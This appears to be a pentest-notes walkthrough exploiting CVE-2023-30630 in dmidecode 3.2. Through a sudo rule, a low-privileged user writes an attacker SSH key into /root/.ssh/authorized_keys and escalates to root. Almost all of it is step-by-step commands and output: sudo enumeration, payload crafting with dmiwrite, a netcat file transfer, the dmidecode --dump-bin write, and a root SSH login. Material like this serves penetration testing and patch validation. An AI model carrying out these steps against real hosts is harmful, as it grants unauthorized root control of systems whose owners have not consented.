Dmidecode - CVE-2023-30630
Dmidecode is a tool for dumping a computers DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the systems hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.
With root permissions to dmidecode
a low privileged user can use the application maliciously to escalate its privileges to root through a file write vulnerability.
Use the tool dmiwrite
to build malicious payload.
## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
(root) NOPASSWD: /usr/sbin/dmidecode
## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2
## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]
## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
Setting checksum: memset(buf+30, 130, 1);
Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.
## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi
## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.
# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory
## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
Last updated
Was this helpful?